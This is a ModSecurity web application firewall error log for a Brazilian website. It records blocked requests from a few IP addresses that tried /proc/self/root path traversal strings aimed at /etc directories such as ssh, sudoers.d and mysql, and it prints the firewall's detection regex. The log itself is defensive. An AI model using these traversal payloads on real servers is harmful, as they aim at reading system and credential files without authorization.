[Fri Mar 20 08:12:22.532268 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:45130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rlvqxLDW4GITHUkTqCAAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:23.859877 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:45136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rlwF0L0L-SsrnPo5rhQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:25.170806 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:45140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rmQF0L0L-SsrnPo5rhwAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:26.579096 2026] [:error] [pid 11642:tid 140411540502272] [client 74.7.241.31:45156] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rmrninkcc-iUj5Apg2wAAA5g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:27.853393 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:51736] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rm9a6ubjKNq_cu4bXVAAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:29.087273 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:51746] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rnQF0L0L-SsrnPo5riAAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:30.372707 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.241.31:51752] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rnvXLqtnMIWvjpaKc_AAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:34.967136 2026] [:error] [pid 10189:tid 140411691570944] [client 74.7.241.31:51764] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rojJ3M9BSuKP7CAYeNQAAAIY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:39.656274 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.241.31:51766] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rp11pVZ5mVmJwsFMzdwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:41.971126 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:41376] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rqRCii7xarUs8iHZqGwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:44.073271 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:46844] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rrPqxLDW4GITHUkTqMQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:12:44.350899 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.241.31:41380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rrPXLqtnMIWvjpaKdAAAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:45.683063 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:41394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rrQF0L0L-SsrnPo5rkAAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:53.144277 2026] [:error] [pid 7235:tid 140411574073088] [client 74.7.243.128:49612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rtfqxLDW4GITHUkTqPAAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:53.604569 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.241.31:41404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rtfHIg5MgXLBnicP54QAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:12:59.415953 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.241.31:51082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ruzJ3M9BSuKP7CAYeRQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:13:03.851358 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.243.128:47478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rvwF0L0L-SsrnPo5rngAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:13:07.584932 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:54196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rw9a6ubjKNq_cu4bXcgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 08:13:09.983895 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.243.128:54208] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0rxeoXxyEfFpUF8f-DxgAAAUg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 08:13:15.452393 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:56288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0ry9a6ubjKNq_cu4bXeAAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 08:13:26.102842 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.228.61:56776] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0r1vqxLDW4GITHUkTqYAAAARE"]
[Fri Mar 20 08:13:29.419557 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:54652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0r2fqxLDW4GITHUkTqZgAAAQw"], referer: 